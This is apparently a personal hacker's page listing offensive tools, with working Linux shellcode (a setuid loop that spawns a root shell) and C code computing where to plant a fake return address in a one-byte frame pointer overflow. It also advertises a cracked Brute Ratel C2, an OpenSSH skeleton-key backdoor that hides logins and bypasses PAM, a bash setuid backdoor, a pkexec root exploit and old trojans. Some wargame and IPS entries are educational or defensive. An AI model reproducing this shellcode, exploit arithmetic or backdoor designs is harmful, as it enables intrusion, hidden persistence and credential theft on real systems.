.dtors [at] bob [dot] net

dtors

    "\x31\xc0\x31\xdb\x31\xd2\x53\x68\x20\x44\x53\x52"
    "\x68\x66\x72\x6f\x6d\x68\x62\x6f\x62\x20\x89\xe1"
    "\xb2\x0f\xb0\x04\xcd\x80\x31\xc0\xb0\x01\xcd\x80";
Recent Misc
Remember the wargames of the 2000s? Play here. There is a series of levels (4 as of writing) that will lead you to getting root on a server. Every level has clues to help you with the next. Have fun!

Post Exploitation Framework: BruteRatel-1.2.2-Cracked.zip is a customised command and control centre for red team and adversary simulation. Documentation is here.

IPS: Grepinator is a firewall wrapper for ipset and iptables. It uses pre-defined filters to comb through log files and match patterns that may indicate an attempt at hacking, brute-forcing or enumerating a server, and blocks the offending source addresses.

Backdoor: OpenSSH-8.4-backdoor.patch is a patch I wrote for the most recent version of OpenSSH (8.4 Portable as of writing). This patch adds a hardcoded skeleton key to the ssh daemon. A few bonuses include:
  • No connection traces in the log files
  • Usernames and passwords, both inbound and outbound, are logged - currently not enabled
  • PAM bypass
  • Security through obscurity? Logging of usernames and passwords can be routed to /dev/null when deemed an invasion of privacy. Alternatively, use it to recover passwords on a compromised system.

    Shellcode: set-loop.c - loops setuid() from UID 0 upwards until the call succeeds, then spawns a shell. Most services run as non-root, so something generic was called for: a root (or CAP_SETUID) process lands on UID 0, anything else lands on the first of its own UIDs the kernel accepts.
    /* Linux/x86. ebx = 0; loop: eax = setuid(ebx); if (eax != -1) break; ebx++;
     * then execve("/bin//sh", {"/bin//sh", NULL}, NULL) and exit(). The raw
     * syscall returns -errno, so only -1 (EPERM) is treated as failure. */
    char shellcode[] =
            "\x31\xdb\x31\xc9\x31\xc0\xb0\x17\xcd\x80\x3d\xff\xff\xff\xff"
            "\x72\x04\x43\x41\xeb\xef\x31\xc0\x50\x68\x6e\x2f\x73\x68\x68"
            "\x2f\x2f\x62\x69\x89\xe3\x8d\x54\x24\x08\x50\x53\x8d\x0c\x24"
            "\xb0\x0b\xcd\x80\x31\xc0\x40\xcd\x80";
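The same control flow written out in C, as an added example (not part of set-loop.c), so the loop can be read and tested without running the raw bytes. The `find_settable_uid()` name, the `limit` bound and the two fake kernels are my additions; the shellcode itself has no bound and relies on setuid(getuid()) always succeeding to terminate.

```c
/* Added example, not from set-loop.c: the setuid loop from the shellcode in
 * plain C.  Shellcode flow: ebx = 0; loop { eax = setuid(ebx);
 * if (eax != -1) break; ebx++; } then execve("/bin//sh").
 * (ecx is also incremented in the loop but never read.)
 */
#include <stdio.h>
#include <unistd.h>
#include <sys/types.h>

typedef int (*setuid_fn)(uid_t);

/* Walk uid = 0,1,2,... until try_setuid() returns something other than -1.
 * `limit` is an addition for safety (the shellcode has none).  Returns the
 * first accepted uid, or -1 if nothing below `limit` was accepted.  Starting
 * at 0 means the most privileged uid the kernel allows is taken: 0 for a
 * root/CAP_SETUID process, otherwise one of the caller's own uids. */
long find_settable_uid(setuid_fn try_setuid, uid_t limit)
{
    for (uid_t uid = 0; uid < limit; uid++) {
        if (try_setuid(uid) != -1)      /* shellcode: cmp eax,-1 ; jb spawn */
            return (long)uid;
    }
    return -1;
}

/* Constructed stand-ins for the kernel, so the loop can be exercised without
 * privileges.  An unprivileged uid-1000 process: setuid() accepts only 1000. */
static int fake_setuid_uid1000(uid_t uid) { return uid == 1000 ? 0 : -1; }

/* A root / CAP_SETUID process: every uid is accepted, so 0 wins immediately. */
static int fake_setuid_root(uid_t uid) { (void)uid; return 0; }

int main(void)
{
    /* Against the real kernel: as root this prints 0, as uid 1000 it prints
     * 1000 after 1000 failed EPERM calls, exactly as the shellcode would. */
    long uid = find_settable_uid(setuid, 65536);
    if (uid < 0) {
        fputs("no settable uid found\n", stderr);
        return 1;
    }
    printf("setuid(%ld) accepted; the shellcode would now execve /bin//sh\n", uid);
    return 0;
}
```

The compare against exactly -1 matters: the raw int 0x80 path returns -errno, so a failure other than EPERM (any value unsigned-below 0xffffffff) would satisfy the `jb` and spawn the shell without a uid change.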
    
    Script Obfuscator: a bash script obfuscator. Obfuscation (or beclouding) is the hiding of intended meaning in communication, making it confusing, wilfully ambiguous and harder to interpret. Anyone with half a brain cell can reverse this obfuscation, but it was better than plaintext for its intended purpose.

    OLD Wargames: BishII was one of the first multi-shellcode, multi-platform eggshell loaders back in the mid-2000s.

    Exploit (golden oldie): YahPoo.c was an exploit I wrote for a vulnerability I found in the Yahoo Messenger Windows application over a decade ago. This was the first exploit I sold to VeriSign (formerly iDefense). This vulnerability affected MILLIONS of Yahoo Messenger clients worldwide and, with the right shellcode, allowed an attacker to install a backdoor on any Windows machine of that era (XP/2k).

    Backdoor: Bash-4.2.patch is a patch to chmod a 'file' 4775 (setuid) should a certain 'condition' exist. This tool/backdoor was used to regain root access in a King of the Hill style wargame. See the patch for more info.

    Documents: A bit of light reading...

    Mirror: blasty-vs-pkexec.c - local root exploit, mirrored here. The original can be found at https://haxx.in

    Museum Section (8+ years old)
    sunny-day.c - A purpose-built bug for exploring frame pointer vulnerabilities.

    What happens when you overwrite the least significant byte of a saved frame pointer?

    Tips:
  • main()'s stack frame will be shifted downward, into the overflowed buffer (if X > Y).
  • X is the original least significant byte.
  • Y is the overflow byte.

    /exploits - Archive of my old exploits from 2000-2010
    /shellcode - Archive of my shellcode from 2000-2010
    /papers - Archive of my tutorials on shellcoding, exploiting buffer overflows, bit manipulation etc. from 2000-2010
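The arithmetic behind the sunny-day.c exercise, as an added example that is not part of sunny-day.c or its archive: given the original low byte X of the saved frame pointer and the overflow byte Y, where does main() end up fetching its return address, and at which offset in the overflowed buffer must the fake return address be planted? The frame layout, the function names and the constructed addresses in main() are my assumptions (a conventional gcc -m32 frame with frame pointers enabled and no stack protector).

```c
/* Added example, not from sunny-day.c: one-byte saved frame pointer overwrite
 * arithmetic on 32-bit x86 with frame pointers enabled.
 *
 * Assumed layout of the vulnerable function's frame (low -> high addresses):
 *   [ buf[n] ][ saved ebp ][ saved eip ]
 * An off-by-one write of Y into buf[n] replaces the least significant byte X
 * of the saved ebp.  When the vulnerable function executes leave/ret, main()
 * inherits the corrupted ebp; main()'s own leave/ret then does
 *   esp = ebp ; pop ebp ; ret
 * so main() "returns" to the 4 bytes found at corrupted_ebp + 4.
 */
#include <stdint.h>
#include <stdio.h>

typedef uint32_t addr_t;

/* main()'s frame pointer after its least significant byte X is replaced by Y. */
addr_t corrupted_fp(addr_t saved_ebp, uint8_t y)
{
    return (saved_ebp & 0xffffff00u) | y;
}

/* Stack slot main()'s leave/ret will fetch its return address from. */
addr_t hijacked_ret_slot(addr_t saved_ebp, uint8_t y)
{
    return corrupted_fp(saved_ebp, y) + 4;
}

/* If that slot lies wholly inside the attacker-controlled buffer [buf, buf+n),
 * return the byte offset within buf where the fake return address must be
 * planted; otherwise return -1.  The frame only moves *down* into the buffer
 * when Y < X (the "X > Y" tip); Y > X moves it up, away from the buffer, and
 * Y == X leaves it where it was. */
long fake_ret_offset(addr_t buf, uint32_t n, addr_t saved_ebp, uint8_t y)
{
    addr_t slot = hijacked_ret_slot(saved_ebp, y);
    if (slot < buf || slot + 4 > buf + n)
        return -1;
    return (long)(slot - buf);
}

int main(void)
{
    /* Constructed addresses: a 64-byte buffer at 0xbffff700 and a saved ebp
     * whose value is 0xbffff7a8 (so X = 0xa8).  Y = 0x20 pulls main()'s frame
     * down into the buffer; Y = 0xf0 pushes it up and out of reach. */
    addr_t buf = 0xbffff700u, saved_ebp = 0xbffff7a8u;
    uint8_t ys[] = { 0x20, 0xf0, 0xa8 };

    for (unsigned i = 0; i < sizeof ys; i++) {
        long off = fake_ret_offset(buf, 64, saved_ebp, ys[i]);
        printf("Y=0x%02x -> corrupted ebp 0x%08x, ret slot 0x%08x, buf offset %ld\n",
               ys[i], corrupted_fp(saved_ebp, ys[i]),
               hijacked_ret_slot(saved_ebp, ys[i]), off);
    }
    return 0;
}
```

Only the low byte is under attacker control, so the shifted frame always stays within the same 256-byte-aligned span as the original saved ebp value; if the buffer straddles that boundary, no Y can bring the return slot into it, and the function reports -1.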
    SmS.c - Remotely execute commands on a server using SMS or email. This is a small daemon that monitors the mail queue for specific strings; when one is identified correctly, the accompanying command is executed. This tool was once a very useful part of my toolkit, that is, before smart phones were invented. Old hat now :(
    Ancient: TrojanSpy:Linux/LSD.A - What began as a honeypot project ended up leaking onto the popular PacketStormSecurity website. Somehow this very basic trojan was used in educational studies on reverse engineering viruses and trojans. See the PDF from https://www.wcsit.org

    PacketStormSecurity later changed the description of the trojan to reflect that, instead of being an exploit released by "The Last Stage of Delirium", it is a trojan: "The hp-ftp trojan pretends to be an exploit created by the Last Stage of Delirium that targets HP-UX FTP servers. Upon execution this file will try to add two new accounts to the password file and will send an email with netstat information to aborted@yahoo.com and LinuxPir8@yahoo.com." - No one said it was pretty!